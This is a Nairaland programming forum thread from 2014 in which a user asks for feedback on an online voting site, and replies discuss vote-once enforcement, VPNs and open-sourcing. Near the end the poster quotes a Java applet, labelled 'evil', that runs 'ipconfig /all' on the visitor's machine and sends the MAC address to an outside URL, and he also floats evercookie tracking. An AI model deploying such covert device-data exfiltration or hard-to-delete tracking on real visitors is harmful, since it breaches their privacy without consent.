Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,153,187 members, 7,818,603 topics. Date: Sunday, 05 May 2024 at 07:38 PM

Collaborators Wanted For This Online Voting Application - Programming - Nairaland

Nairaland Forum / Science/Technology / Programming / Collaborators Wanted For This Online Voting Application (3069 Views)

Fintech Collaborators Needed / Csc Project On Online Voting System With Php / Need Help/collaborators On Occupy9ja.com (2) (3) (4)

(1) (2) (Reply) (Go Down)

Collaborators Wanted For This Online Voting Application by internetvote: 10:20am On Nov 06, 2014
I have created this Online voting application for Nigerian at http://www.nairavote.com

I would like you to help me to test it and to suggest improvements.

Updated: Collaborators are welcomed

2 Likes

Re: Collaborators Wanted For This Online Voting Application by dimensional(m): 10:30am On Nov 06, 2014
Creative, let the e-voting commence Op spread voting portal via social media networks let know who gat it all GEJ vs GMB
Re: Collaborators Wanted For This Online Voting Application by internetvote: 11:01am On Nov 06, 2014
dimensional:
Creative, let the e-voting commence Op spread voting portal via social media networks let know who gat it all GEJ vs GMB

Thanks for you comment. Please help spread the word.
Re: Collaborators Wanted For This Online Voting Application by Nobody: 9:28pm On Nov 06, 2014
Impressive! This is front page tinz
Re: Collaborators Wanted For This Online Voting Application by africanaija: 10:10pm On Nov 06, 2014
Pretty cool, please keep up the good work.
Re: Collaborators Wanted For This Online Voting Application by davidsmith8900: 10:13pm On Nov 06, 2014
I think it's nice. Do you plan on making a mobile app?
Re: Collaborators Wanted For This Online Voting Application by IamGodzilla: 10:16pm On Nov 06, 2014
Errors: users can re vote, when you clear your browsers cache,history, cookie.... (Tackle this by saving ip address)

Error2: change of ip, enables re voting. For same user.( Tackle this, saving the ip or mac of the device, device type, location, and other information you can think of).

Keep it up.

2 Likes

Re: Collaborators Wanted For This Online Voting Application by naijatechworld: 10:16pm On Nov 06, 2014
internetvote:
I have created this Online voting application for Nigerian at http://www.nairavote.com

Please help me test it and you can offer your suggestions and contributions for improvements

I like it but do you have any plans to make it secure it enough, that only Nigerians vote in it, as well as make sure that people don't vote twice and there are no bots or spammers vote in order to increase count for a particular party?
Re: Collaborators Wanted For This Online Voting Application by internetvote: 10:44pm On Nov 06, 2014
davidsmith8900:
I think it's nice. Do you plan on making a mobile app?

Thx. I will work on a mobile app version later.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 10:55pm On Nov 06, 2014
IamGodzilla:
Errors: users can re vote, when you clear your browsers cache,history, cookie.... (Tackle this by saving ip address)

Error2: change of ip, enables re voting. For same user.( Tackle this, saving the ip or mac of the device, device type, location, and other information you can think of).

Keep it up.

Thx for your suggestions. Getting a visitor's MAC address will be the ultimate guarantee to uniquely identify a visitor, this I'm working on at present. Another alternative is the use browser fingerprinting but the device must have JavaScript enabled.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 11:10pm On Nov 06, 2014
naijatechworld:

I like it but do you have any plans to make it secure it enough, that only Nigerians vote in it, as well as make sure that people don't vote twice and there are no bots or spammers vote in order to increase count for a particular party?

Thanks for the interest you have shown in this application. Yeah I can make it so that only Nigerians can vote in it, by checking the country's IP location to only allow voting in Nigeria. I will continue to improve the site to make ensure the other issues you raised will not occur.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 12:43am On Nov 07, 2014
africanaija:
Pretty cool, please keep up the good work.

Thx I will keep improving on it.
Re: Collaborators Wanted For This Online Voting Application by Nobody: 5:49am On Nov 07, 2014
This is fake and lacks public interest...your cookies are visible to js, your site is prone to vpn, and we dont even know who you are....how do we hold anyone accountable for misconduct? How can we tell if the Op or someone else is cheating? A e-voting like this needs a credible team of well known, neutral and trustable members not some guy in some corner...
Re: Collaborators Wanted For This Online Voting Application by internetvote: 8:32am On Nov 07, 2014
mobolaji88:
This is fake and lacks public interest...your cookies are visible to js, your site is prone to vpn, and we dont even know who you are....how do we hold anyone accountable for misconduct? How can we tell if the Op or someone else is cheating? A e-voting like this needs a credible team of well known, neutral and trustable members not some guy in some corner...

Be rest assured that I'm a Nairalander who has a passion for building web applications. I will continue to make improvements on it to stop any form of cyber rigging. As this is a we application with no registration required, it will not be possible at present to make anyone accountable for misconduct, until we can make people to register like banks do.

You can help us build a team here so that this web application can become an acceptable way for us to vote in the future.

1 Like

Re: Collaborators Wanted For This Online Voting Application by Nobody: 11:20am On Nov 07, 2014
internetvote:

Be rest assures that I'm a Nairalander who has a passion for building web applications. I will continue to make improvements on it to stop any form of cyber rigging. As this is a we application with no registration required, it will not be possible at present to make anyone accountable for misconduct, until we can make people to register like banks do.

You can help us build a team here so that this web application can become an acceptable way for us to vote in the future.
Though i like your idea and i think it makes big sense, but i would love if you could opensource it! I can develop algorithms that will prevent VPN users without the need for registeration among other improvements. Also i think other guys can help a lot with the design and security also. Please opensource this project, cos if u do, u'l nt only get optimal functionalties but a huge trust base from nigerians.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 12:57pm On Nov 07, 2014
mobolaji88:

Though i like your idea and i think it makes big sense, but i would love if you could opensource it! I can develop algorithms that will prevent VPN users without the need for registeration among other improvements. Also i think other guys can help a lot with the design and security also. Please opensource this project, cos if u do, u'l nt only get optimal functionalties but a huge trust base from nigerians.

Opensource! No O grin, I have already used complex algorithms for the voting functionality and the back-end SQL which I would like to retain as my own intellectual property. I will continue to improve on the application so that it can retrieve the MAC address of every device that visits this site as the MAC address of a device has no duplicate and it is unique to that device only.
Re: Collaborators Wanted For This Online Voting Application by Nobody: 7:42pm On Nov 07, 2014
internetvote:

Opensource! No O grin, I have already used complex algorithms for the voting functionality and the back-end SQL which I would like to retain as my own intellectual property. I will continue to improve on the application so that it can retrieve the MAC address of every device that visits this site as the MAC address of a device has no duplicate and it is unique to that device only.
Funny guy, a typical naija programmer..SMH 4 u

1 Like

Re: Collaborators Wanted For This Online Voting Application by Nobody: 8:24pm On Nov 07, 2014
Infact, this are the people we indeed need to develop this country.
Keep it up bro, together we can change the world.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 11:02am On Nov 08, 2014
bambeolumide:
Infact, this are the people we indeed need to develop this country.
Keep it up bro, together we can change the world.

Thx for your kind words, we will surely get there one day and make our country naija to overtake countries like Japan.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 11:08am On Nov 08, 2014
mobolaji88:

Funny guy, a typical naija programmer..SMH 4 u

If you can assist to make it opensource for investors, then I'm in for that kind of opensource grin
Re: Collaborators Wanted For This Online Voting Application by Nobody: 11:24am On Nov 08, 2014
internetvote:

If you can assist to make it opensource for investors, then I'm in for that kind of opensource grin
thought as much, so its 4 d money..soon u're gona fill up the whole page with annoying ads ryt?
Anyway dear, making a project opensource doesnt mean u the creator becomes anonymous..no..infact u just become an indirect CEO with a huge employee base(though employees work voluntarily).
The linux OS is a typical example of how opensource can be a good thing..despite the fact that hundreds of people contribute to linux's development, the creator still get to claim the fame...
And opensourcing is 4 developers nt investors.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 11:40am On Nov 08, 2014
mobolaji88:

thought as much, so its 4 d money..soon u're gona fill up the whole page with annoying ads ryt?
Anyway dear, making a project opensource doesnt mean u the creator becomes anonymous..no..infact u just become an indirect CEO with a huge employee base(though employees work voluntarily).
The linux OS is a typical example of how opensource can be a good thing..despite the fact that hundreds of people contribute to linux's development, the creator still get to claim the fame...
And opensourcing is 4 developers nt investors.

I posted it here for others to test and for their comments and contributions. Making it opensource at this stage when the voting application is 100% complete and fully functional is not really a good idea. Thought you will get my joke about making it opensource for investors.

Updated: If I want to pay you to come and work on this project will you say no grin
Re: Collaborators Wanted For This Online Voting Application by ghettodreamz(m): 3:38am On Nov 09, 2014
Nice project @ Op. What lingo did you developed this with?
Keep it up!
Re: Collaborators Wanted For This Online Voting Application by internetvote: 1:44pm On Nov 09, 2014
ghettodreamz:
Nice project @ Op. What lingo did you developed this with?
Keep it up!

Thx I will do my best to keep improving on it.
If I mention the language it was built with, it might start a language war here grin
Re: Collaborators Wanted For This Online Voting Application by ghettodreamz(m): 3:35pm On Nov 09, 2014
internetvote:

Thx I will do my best to keep improving on it.
If I mention the language it was built with, it might start a language war here grin

Funny, I don't foresee such, good effort anyways.
Re: Collaborators Wanted For This Online Voting Application by WhiZTiM(m): 8:06pm On Nov 09, 2014
mobolaji88:

Calm down!!!!

Admittedly, the OP may not be a professional(from some of his statement) . But at least you could have come softly on him.

I think its more of a fun platform. . . I love the idea. Thought of it before.

OP, sincerely, I doubt much on the value of what you are holding on to as Intellectual property.

... I read all posts... And I have just a few cents to add.

* There's no fool proof way to stop cheaters. The best that can be done is to make the cheating process really hard... ..and that is by bookkeeping... (storing some data uniquely)

* at a very high efficiency, you will require some signup and authorization mechanism...
Which can turn users off... Believe me I am always reluctant to register with websites.

* using GSM number seems to be the best choice to me. But as mentioned, trust issues arises...

* email is good too. Type your email... Check your email for authorization link... And use that link to vote....
---- I like this option... It's quite easy to scramble authorization link with specific email address... You may want to use a form of simply hashing + (systematically salting) the email address to produce the link. ...
--- you can program your salting algorithm / procedure to change everyday, forever....
--- have the string result scrambled by switching some character positions.
--- a 128 length alphanumeric string will be very difficult to guess correctly.

* You can also have inputs for STATE, PARTY, EMAIL that must be filled... ..sent to your server And a direct voting link is sent to your email address..(it wouldn't stop non Nigerian voters... But hey, you are one step ahead!!)

* it really depends on what you want anyway...

* AND OHH.. One correction, Mac-address is not "unique" , hence a poor security choice... I mean, it can be emulated.

* You aren't dealing with raw sockets are you?
Even so... how the hell, are you gonna get the MAC Address of a User using HTTP over layers of TCP/IP routing and NAT? ...I want to learn ohh...

Regards,
Timothy

1 Like

Re: Collaborators Wanted For This Online Voting Application by internetvote: 9:40pm On Nov 09, 2014
WhiZTiM:

* You aren't dealing with raw sockets are you?
Even so... how the hell, are you gonna get the MAC Address of a User using HTTP over layers of TCP/IP routing and NAT? ...I want to learn ohh...

Regards,
Timothy

Phew! You really went into great detail, thank you so much for taking your time to do so.

My aim is not to scare voters off, that is the reason I want to avoid any form of registration unless it is to be used for a real election.

I have found two options for now to track voters so that they can only vote once even if a voter deletes the traditional HTTP cookie from their device.

The first is evercookies at http://samy.pl/evercookie http://en.wikipedia.org/wiki/Evercookie it is a JavaScript library which stores itself in multiple locations which makes it a difficult cookie to delete. But for ethical reasons I will have to inform the voters about this type of cookie, before they go ahead to vote.

The second is the Java Applet below at: http://diablohorn./2008/10/28/trusting-java-applets that can get the MAC address of a device, though I have not yet tried it, but this will be my preferred option if it works.

<HTML>
<HEAD>
<TITLE&gt;Get MacAddress Applet&lt;/TITLE>
</HEAD>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>
<PARAM NAME="BASEURL" VALUE="http://www.google.com/bleh=">
</applet>
</BODY>
</HTML>
So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
* This applet gets the mac address from a windows machine
* @author DiabloHorn
*/
public class GetMacAddress extends Applet {

/** Creates a new instance of GetMacAddress*/
public void init() {
try{
String macAddress = this.getMacAddress();
URL url = new URL(this.getParameter("BASEURL"wink+macAddress);
getAppletContext().showDocument(url, "_self"wink;
}catch(Exception e){
System.out.println(e);
}
}

public String getMacAddress() throws IOException {
String macAddress = null;
String command = "ipconfig /all";
Process pid = Runtime.getRuntime().exec(command);
BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
while (true) {
String line = in.readLine();
if (line == null) {
break;
}

Pattern p = Pattern.compile(".*((:?[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*",Pattern.CASE_INSENSITIVE);
Matcher m = p.matcher(line);
if (m.matches()) {
macAddress = m.group(1);
break;
}
}
in.close();
return macAddress;
}
}
Re: Collaborators Wanted For This Online Voting Application by internetpo(m): 1:54pm On Nov 17, 2014
Nice project. I love this.
take note of th eadvice by naijatechworld and Iamgodzilla!

pretty impresive project I must say going places.
Have you written to NGOS and civil society organisations for sponsorship/adoption of the site?

Why is this not on the frontpage by the way. angry angry angry
Re: Collaborators Wanted For This Online Voting Application by internetvote: 5:11pm On Nov 17, 2014
internetpo:
Nice project. I love this.
take note of th eadvice by naijatechworld and Iamgodzilla!

pretty impresive project I must say going places.
Have you written to NGOS and civil society organisations for sponsorship/adoption of the site?

Why is this not on the frontpage by the way. angry angry angry

Thanks for dropping your comment. Yeah the advice of naijatechworld and Iamgodzilla can be taken care of once I get the interest of the organisations you suggested. Though I'm not sure of how to get them interested.
Re: Collaborators Wanted For This Online Voting Application by internetpo(m): 12:54pm On Nov 18, 2014
internetvote:

Thanks for dropping your comment. Yeah the advice of naijatechworld and Iamgodzilla can be taken care of once I get the interest of the organisations you suggested. Though I'm not sure of how to get them interested.
Get someone to help you write a proposal, search google for their websites n addresses, attend any of their meetings/ press conferences (they holding a lot of them recently). Hard work of course but the pay at the end of d day is gonna b huge.
Re: Collaborators Wanted For This Online Voting Application by internetvote: 6:30pm On Nov 18, 2014
internetpo:

Get someone to help you write a proposal, search google for their websites n addresses, attend any of their meetings/ press conferences (they holding a lot of them recently). Hard work of course but the pay at the end of d day is gonna b huge.

Nice advice bro. Any chance you and I can go into partnership? I do the coding and you bring the investors in, how about that?
Re: Collaborators Wanted For This Online Voting Application by internetpo(m): 12:17am On Nov 19, 2014
internetvote:

Nice advice bro. Any chance you and I can go into partnership? I do the coding and you bring the investors in, how about that?
sorry hands are full. cant help

(1) (2) (Reply)

Using Next/prev Button To Display Array Elements / Response To The Thread Where Is Airsaylongcom / How To Develop Instant Android Chating App(social Network)

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 61
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.